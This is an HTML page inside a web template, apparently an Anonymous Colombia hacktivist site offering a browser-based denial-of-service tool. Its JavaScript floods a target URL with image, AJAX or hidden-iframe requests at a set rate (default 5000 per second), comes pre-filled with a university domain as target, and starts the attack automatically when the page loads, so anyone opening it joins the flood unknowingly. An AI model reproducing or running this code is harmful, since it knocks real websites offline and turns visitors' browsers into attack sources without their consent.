 
{% block content %}
  	 
 
 <link rel="stylesheet" href="static/bootstrap-4.0.0/css/bootstrap.min.css " crossorigin="anonymous">
 
 
 
 <ul id="menu-top-menu" class="nav navbar-nav nav-list">
						<li><a href="#home">SPOOFING</a></li>
					<li><a href="#about">PISHING</a></li>
					<li><a href="#services">GEOLOCALIZACION</a></li>
					<li><a href="#pricing">DENEGACION DE SERVICIO</a></li>
					<li><a href="#blog">SALIR</a></li>
					<li><a href="#contact">Contact</a></li>
					 </li>
					 
				</ul>

  <div class="collapse navbar-collapse" id="navbarSupportedContent">
 
    <form class="form-inline my-2 my-lg-0">
      <input class="form-control mr-sm-2" type="search" placeholder="Search" aria-label="Search">
      <button class="btn btn-outline-success my-2 my-sm-0" type="submit">Search</button>
    </form>
  </div>
</nav>
				
	
       
  
<!-- INTRO
================================================== -->
<section id="home" >
</section>

<!-- ABOUT
================================================== -->
<section   >
	 
</section>

<!-- TEAM
================================================== -->
<section id="team" class="panel-grid">
	 
</section>

<!-- SERVICES
================================================== -->		
<section id="services" class="services margintop60">
	 

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
 
transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>alert('HERRAMIENTA PARA DDOS, CREADO POR @ANONYMOUS UN TAL PIRU and @ANONYMOUSOPCOL')</script>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"g">
<div data-video="gyQ0H09uztw" 
            data-autoplay="1"       
                    data-loop="1"        
           id="youtube-audio">
     <script src="https://www.youtube.com/iframe_api"></script>
     <script src="https://cdn.rawgit.com/labnol/files/master/yt.js"></script> 
  </div>
<title>WEBHIVE-ANONYMOUSOPCOL</title>

<link rel="SHORTCUT ICON" type="chliz" href="https://i.ibb.co/9q515Mx/GBWEx-FW-400x400.jpg">
<style>

html {
background-color:#000000;
min-height:100%;
background-image: linear-gradient(bottom, #000000 0%, #455463 100%);
background-image: -o-linear-gradient(bottom, #000000 0%, #455463 100%);
background-image: -moz-linear-gradient(bottom, #000000 0%, #455463 100%);
background-image: -webkit-linear-gradient(bottom, #000000 0%, #455463 100%);
background-image: -ms-linear-gradient(bottom, #000000 0%, #455463 100%);
background-image: -webkit-gradient(linear, left bottom, left top, color-stop(0, #0F1823), color-stop(1,
 
#455463));
}

 body {
background:  url("https://i.ibb.co/m0mcTV6/Anonymous-Pictures-Images-wallpaper-wp2002392.jpg");
background-repeat: no-repeat;
background-position: center;
background-attachment: fixed;

margin: 0;
padding: 0;
font-family: Arial, Helvetica, sans-serif;
}
 html{
@keyframes greenPulse {
0% { background-color: #000000; -webkit-box-shadow:: 0 0 9px #333; }
50% { background-color: #000000; -webkit-box-shadow:: 0 0 18px #91bd09; }
100% { background-color: #000000; -webkit-box-shadow:: 0 0 9px #333; }
}
@keyframes redPulse {
0% { background-color: #f74c44; -webkit-box-shadow:: 0 0 9px #333; }
50% { background-color: #ff3232; -webkit-box-shadow:: 0 0 18px #ff3232; }
100% { background-color: #f74c44; -webkit-box-shadow:: 0 0 9px #333; }
}
@-moz-keyframes greenPulse {
0% { background-color: #749a02; -webkit-box-shadow:: 0 0 9px #333; }
50% { background-color: #91bd09; -webkit-box-shadow:: 0 0 18px #91bd09; }
100% { background-color: #749a02; -webkit-box-shadow:: 0 0 9px #333; }
}
@-moz-keyframes redPulse {
0% { background-color: #f74c44; -webkit-box-shadow:: 0 0 9px #333; }
50% { background-color: #ff3232; -webkit-box-shadow:: 0 0 18px #ff3232; }
100% { background-color: #f74c44; -webkit-box-shadow:: 0 0 9px #333; }
}
@-webkit-keyframes greenPulse {
0% { background-color: #749a02; -webkit-box-shadow:: 0 0 9px #333; }
50% { background-color: #91bd09; -webkit-box-shadow:: 0 0 18px #91bd09; }
100% { background-color: #749a02; -webkit-box-shadow:: 0 0 9px #333; }
}
@-webkit-keyframes redPulse {
0% { background-color: #f74c44; -webkit-box-shadow:: 0 0 9px #333; }
50% { background-color: #ff3232; -webkit-box-shadow:: 0 0 18px #ff3232; }
100% { background-color: #f74c44; -webkit-box-shadow:: 0 0 9px #333; }
}
button#fireButton.ready {
animation-name: greenPulse;
animation-duration: 2s;
animation-iteration-count: infinite;
-moz-animation-name: greenPulse;
-moz-animation-duration: 2s;
-moz-animation-iteration-count: infinite;
-webkit-animation-name: greenPulse;
-webkit-animation-duration: 2s;
-webkit-animation-iteration-count: infinite;
background-color: #91BD09;
-webkit-transition: background-color linear 1s;
}
button#firebutton:hover {
background-color: yellow;
-webkit-transition-duration: 2s; /* applies to the transition *to* the :hover state */
}
button#fireButton.working {
-animation-name: redPulse;
-animation-duration: 1s;
-animation-iteration-count: infinite;
-moz-animation-name: redPulse;
-moz-animation-duration: 1s;
-moz-animation-iteration-count: infinite;
-webkit-animation-name: redPulse;
-webkit-animation-duration: 1s;
-webkit-animation-iteration-count: infinite;
background-color: #ff3232;
-webkit-transition: background-color linear 1s;
 
}
button#fireButton {
font-size: 14px;
padding: 8px 19px 9px;
display: table;
color: white !important;
font-size: 13px;
font-weight: bold;
line-height: 1;
text-decoration: none;
-moz-border-radius: 50px;
-webkit-border-radius: 50px;
border-radius: 50px;
-moz-box-shadow: 0 1px 3px rgba(0,0,0,0.25);
-webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.25);
text-shadow: 0 -1px 1px rgba(0, 0, 0, 0.25);
border-bottom: 1px solid rgba(0, 0, 0, 0.25);
position: relative;
cursor: pointer;
overflow: visible;
margin: 0 auto;
}
div.container {
padding: 10px;
-webkit-border-radius: 10px;
-moz-border-radius: 10px;
border-radius: 10px;
-webkit-box-shadow: 1px 1px 1px 1px rgba(50, 50, 50, 1), inset 2px 2px 7px #000;
-moz-box-shadow: 1px 1px 1px 1px rgba(50, 50, 50, 1), inset 2px 2px 7px #000;
box-shadow: 1px 1px 1px 1px rgba(50, 50, 50, 1), inset 2px 2px 7px #000;
border: 2px solid #FFF;
background: #f6f8f9;
background: -moz-linear-gradient(top, #f6f8f9 0%, #e5ebee 50%, #d7dee3 51%, #f5f7f9 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f6f8f9), color-stop(50%,#e5ebee),
 
color-stop(51%,#d7dee3), color-stop
 
(100%,#f5f7f9));
background: -webkit-linear-gradient(top, #f6f8f9 0%,#e5ebee 50%,#d7dee3 51%,#f5f7f9 100%);
background: -o-linear-gradient(top, #f6f8f9 0%,#e5ebee 50%,#d7dee3 51%,#f5f7f9 100%);
background: -ms-linear-gradient(top, #f6f8f9 0%,#e5ebee 50%,#d7dee3 51%,#f5f7f9 100%);
background: linear-gradient(top, #f6f8f9 0%,#e5ebee 50%,#d7dee3 51%,#f5f7f9 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f6f8f9', endColorstr='#f5f7f9',GradientType=0
 
);
}
#footer, #footer a, #footer a:link, #footer a:active, #footer a:visited, #footer a:hover {
font-size: small;
color: white;
}
h1 {
font-size: 3.0em;
font-weight: 600;
color: black;
position: relative;
display: inline;
padding: 0 1px 0 0px;
margin: 0 auto;
}
h1::before {
content: attr(title);
position: absolute;
color: rgba(255, 255, 255, 0.15);
top: 1px;
left: 1px;
}
input[type=text] {
padding: 8px 3px;
background: black;
border: 1px solid #DEDEDE;
color: #000;
background: -webkit-gradient(linear, left top, left bottom, from(#F9F9F9), to(white));
background: -moz-linear-gradient(top, #F9F9F9, white);
-webkit-box-shadow: inset 1px 1px #ccc;
-moz-box-shadow: inset 1px 1px #ccc;
box-shadow: inset 1px 1px #ccc;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
}
</style>
</head>
<body>
<div style="clear: both; width: 650px; margin-left: auto; margin-right: auto; padding-top: 30px;">
<font color="#FF0000"> # =================================================[</font><a href="https://anonymousopcol.000webhostapp.com/index.html"><font color="white">Volver Al Inicio</a></font><font color="#FF0000">] </font></div><br>
<div id="footer"> <font color="white" size="+3" > ANONYMOUS COLOMBIA </font></div>
<img  src="https://i.ibb.co/9q515Mx/GBWEx-FW-400x400.jpg" 
WIDTH=107 HEIGHT=80
><br>

 <ul id="menu-top-menu" class="nav navbar-nav nav-list">
						<li><a href="#home">SPOOFING</a></li>
					<li><a href="#about">PISHING</a></li>
					<li><a href="#services">GEOLOCALIZACION</a></li>
					<li><a href="#pricing">DENEGACION DE SERVICIO</a></li>
					<li><a href="#blog">SALIR</a></li>
					<li><a href="#contact">Contact</a></li>
					 </li>
					 
				</ul>
<br><b><div id="footer"> <font color="white" size="3" > La denegacion de servicio consiste en saturar una target "url" <br> con peticiones hasta que colapse y no se pueda entrar a esta. </b></font></div>
<br style="clear: both;" />
<div class="container" style="float: left; margin-top: 10px; width: 250px;">
<label><b><font color="white">Tipo De Ataque</font></b><br />
<select id="type" style="width: 130px;" onchange="changeType();">
<option disabled="disabled"> </option>
<optgroup label="Iframe HTTP Request">
<option value="iframe">Iframe sst</option>
</optgroup>
</select>
</label>
<br style="clear: both;" />
<br style="clear: both;" />
<label><b><font color="white">URL:</font></b><br />
<input type="text" id="targetURL" style="width: 130px;" onkeyup="changeValue();"
 
 value="uniguajira.edu.co"/>
</label>
<br style="clear: both;" />
<br style="clear: both;" />
<label><b><font color="white">Peticiones Por/Seg:</font></b><br />
<input type="text" style="width: 130px;" id="rps" value="5000" />
</label>
<br style="clear: both;" />
<br style="clear: both;" />
<label><b><font color="white">Mensaje:</font></b><br />
<input type="text" id="message" style="width: 160px;" value="Somos Anonymous, Somos Legion, No perdonamos, No olvidamos, Esperanos! Anonymous Colombia" />
</label>
</div>
<div class="container" style="float: right; margin-top: 10px; width: 250px;">
<b><font color="white">Estado De La Denegacion</font></b><br style="clear: both;" />
<br><span style="float: left; width: 180px;"><font color="yellow">Solicitudes:</font></span> <span id="requestedCtr"style="color: yellow;">0</span><br />
<span style="float: left; width: 180px;"><font color="blue">Target cargado:</font></span> <span id="succeededCtr"
 
style="color: blue;">0</span><br />
<span style="float: left; width: 180px;"><font color="red">Target no cargado:</font></span> <span id="failedCtr"
 
style="color: red;">0</span>
<br style="clear: both;" />
<br style="clear: both;" />
<label><b></b><br />

<button id="fireButton" class="ready" style="width: 100px; height: 100px;"> INICIAR ATAQUE!
 
</button>
</label>
</div>
</div>

<div style="clear: both; height: 30px;"></div>


<div style="margin-left: auto; margin-right: auto; width: 200px; text-align: center;">
<div id="footer" style="padding-bottom: 25px; position: relative;">
<br><font color="#FF0000">[</font><font color="white">*****************************************</font><font color="#FF0000">]</font><br>
 
<br><br><div ><font color="#FF0000"> [</font><a href="https://twitter.com/anonymousopcol" target="_blank"><font color="white">==>ANONYMOUS_COLOMBIA<==</a></font><font color="#FF0000">]
<br />
<br><script type="text/javascript" src="http://www.usuarios-online.com/usuarios.php?v=www.e-viphostchile.tk/acta.html"></script> <a href="http://www.usuarios-online.com/en/" target="_blank"> Usuarios En Ddos</a>
<script type="text/javascript">
<!--
var r_text = new Array();
r_text[0] = "I disapprove of what you say, <br />but I will defend to the death your right to say
 
it.";
r_text[1] = "United As One. Divided By Zero.";
r_text[2] = "You cannot arrest an idea.";
r_text[3] = "We are Anonymous. <br />We are legion. <br />We do not forgive. <br />We do not
 
forget. <br />Expect us.";
r_text[4] = "Never forget to expect us.";
r_text[5] = "We are one. <br />Divided by zero, <br />we become infinity!";
r_text[6] = "Also c0cks!";
var i = Math.floor(r_text.length*Math.random())
 
document.write(r_text[i]);
//-->
</script>
</div>
</div>
<script type="text/javascript">
var requestedCtrNode = document.getElementById("requestedCtr");
var succeededCtrNode = document.getElementById("succeededCtr");
var failedCtrNode = document.getElementById("failedCtr");
var targetURLNode = document.getElementById("targetURL");
var fireButton = document.getElementById("fireButton");
var messageNode = document.getElementById("message");
var rpsNode = document.getElementById("rps");
var timeoutNode = document.getElementById("timeout");
var typeSelectNode = document.getElementById("type");
var targetURL = targetURLNode.value;
var typeSelect = typeSelectNode.value;
var requestedCtr = 0;
var fireInterval;
var isFiring = false;
var currentTime = new Date()
var lastSuccess = currentTime.getTime();
var requestsHT = {};
 
 
(function () {
succeededCtr = 0;
failedCtr = 0;
 
targetURLNode.onchange = function() {
targetURL = this.value;
};
 
typeSelectNode.onchange = function() {
typeSelect = this.value;
}
 
var makeAjaxGRequest = function() {
if ((currentTime.getTime()-lastSuccess) > 1000) {
return;
} else {
lastSuccess = currentTime.getTime();
};
 
var rID = Number(new Date());
msg = null;
 
var r;
if (window.XMLHttpRequest)
{
r = new XMLHttpRequest();
}
else
{
r = new ActiveXObject("Microsoft.XMLHTTP");
}
 
r.open('GET',targetURL,true);
r.send(msg);
 
requestsHT[rID] = r;
onRequest(rID);
r.onerror = function () { onFail(rID); };
r.onabort = function () { onFail(rID); };
r.onload = function() { onSuccess(rID); };
}
 
var makeAjaxPRequest = function() {
if ((currentTime.getTime()-lastSuccess) > 1000) {
return;
} else {
lastSuccess = currentTime.getTime();
};
 
var rID = Number(new Date());
msg = rID+'='+messageNode.value;
 
var r;
if (window.XMLHttpRequest)
{
r = new XMLHttpRequest();
}
else
{
r = new ActiveXObject("Microsoft.XMLHTTP");
}
 
r.open('POST',targetURL,true);
r.send(msg);
 
requestsHT[rID] = r;
onRequest(rID);
r.onerror = function () { onFail(rID); };
r.onabort = function () { onFail(rID); };
r.onload = function() { onSuccess(rID); };
}
 
var makeIframeRequest = function() {
if ((currentTime.getTime()-lastSuccess) > 1000) {
return;
} else {
lastSuccess = currentTime.getTime();
};
 
var rID = Number(new Date());
var iframe = document.createElement("iframe");
iframe.setAttribute('src', targetURL+'?msg='+messageNode.value);
iframe.setAttribute('style', 'border:none; overflow:hidden; width:0px; height:0px;');
iframe.setAttribute('scrolling', 'no');
iframe.setAttribute('id', rID);
iframe.setAttribute('allowtransparency', 'true');
iframe.setAttribute('frameborder', '0');
document.getElementsByTagName("html")[0].appendChild(iframe);
 
requestsHT[rID] = iframe;
onRequest(rID);
iframe.onload = function () { onSuccess(rID); document.getElementsByTagName("html")
 
[0].removeChild(document.getElementById(rID)); };
iframe.onerror = function () { onFail(rID); document.getElementsByTagName("html")[0].removeChild
 
(document.getElementById(rID)); };
iframe.onabort = function () { onFail(rID); document.getElementsByTagName("html")[0].removeChild
 
(document.getElementById(rID)); };
}
 
var makeImageRequest = function() {
if ((currentTime.getTime()-lastSuccess) > 1000) {
return;
} else {
lastSuccess = currentTime.getTime();
};
 
var rID = Number(new Date());
var img = new Image();
img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
 
requestsHT[rID] = img;
onRequest(rID);
img.onerror = function () { onFail(rID); };
img.onabort = function () { onFail(rID); };
img.onload = function () { onSuccess(rID); };
};
 
var onRequest = function(rID) {
requestedCtr++;
requestedCtrNode.innerHTML = requestedCtr;
};
 
var onComplete = function(rID) {
delete requestsHT[rID];
};
 
var onFail = function(rID) {
failedCtr++;
failedCtrNode.innerHTML = failedCtr;
delete requestsHT[rID];
};
 
var onSuccess = function(rID) {
succeededCtr++;
succeededCtrNode.innerHTML = succeededCtr;
delete requestsHT[rID];
};
 
fireButton.onclick = function() {
if (isFiring) {
fireButton.className = 'ready';
document.getElementById("type").disabled=false;
document.getElementById("targetURL").disabled=false;
document.getElementById("rps").disabled=false;
document.getElementById("message").disabled=false;
clearInterval(fireInterval);
isFiring = false;
this.innerHTML = "Disparar de Nuevo!";
} else {
fireButton.className = 'working';
document.getElementById("type").disabled=true;
document.getElementById("targetURL").disabled=true;
document.getElementById("rps").disabled=true;
document.getElementById("message").disabled=true;
isFiring = true;
this.innerHTML = "Dejar de Disparar!";
 
var interval = (1000 / parseInt(rpsNode.value) | 0);
 
switch(typeSelect) {
case 'image':
fireInterval = setInterval(makeImageRequest, interval);
break;
case 'ajaxget':
fireInterval = setInterval(makeAjaxGRequest, interval);
break;
case 'ajaxpost':
fireInterval = setInterval(makeAjaxPRequest, interval);
break;
case 'iframe':
fireInterval = setInterval(makeIframeRequest, interval);
break;
default:
fireInterval = setInterval(makeImageRequest, interval);
}
}
};
function auto_start(){
if (isFiring) {
fireButton.className = 'ready';
document.getElementById("type").disabled=false;
document.getElementById("targetURL").disabled=false;
document.getElementById("rps").disabled=false;
document.getElementById("message").disabled=false;
clearInterval(fireInterval);
isFiring = false;
fireButton.innerHTML = "Disparar de Nuevo!";
} else {
fireButton.className = 'working';
document.getElementById("type").disabled=true;
document.getElementById("targetURL").disabled=true;
document.getElementById("rps").disabled=true;
document.getElementById("message").disabled=true;
isFiring = true;
fireButton.innerHTML = "Dejar de Disparar!";
 
var interval = (1000 / parseInt(rpsNode.value) | 0);
 
switch(typeSelect) {
case 'image':
fireInterval = setInterval(makeImageRequest, interval);
break;
case 'ajaxget':
fireInterval = setInterval(makeAjaxGRequest, interval);
break;
case 'ajaxpost':
fireInterval = setInterval(makeAjaxPRequest, interval);
break;
case 'iframe':
fireInterval = setInterval(makeIframeRequest, interval);
break;
default:
fireInterval = setInterval(makeImageRequest, interval);
}
}
}
 
auto_start();
})();
 
function changeValue(){
targetURL = document.getElementById("targetURL").value;
document.getElementById("currentTarget").innerHTML = ("Current target: " + targetURL);
}
 
 
function changeType(){
typeSelect = document.getElementById("type").value;
}
</script>
</body>
</html>
<!-- Hosting24 Analytics Code -->
<script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>
<!-- End Of Analytics Code -->
</section>
	
<!-- COUNTERS
================================================== -->
<section  >
	 
</section>

<!-- PRICING
================================================== -->
<section id="pricing" class="margintop60 ow-pt-columns-atom">
 
</section>
		

<!-- TESTIMONIAL
================================================== -->
<section >
	 
</section>
<script src="static/assets/js/jquery.js"></script>
<script src="static/assets/js/plugins.js"></script>
<script src="static/contact/topvalidate.js"></script>
<script src="static/contact/bottomvalidate.js"></script>

<!-- BLOG
================================================== -->
    <!-- JQUERY -->
        <!-- <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>-->
  

    <!-- BOOTSTRAP -->
        <!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script> -->
       
    <!-- Optional JavaScript -->
        <!-- If you want to use th CDN and not the local jquery file to save space then uncomment the CDN script tags and remove the local script tags. -->


    <!-- Ritch Text Editor Simditor JS -->
    
   
{% endblock %}
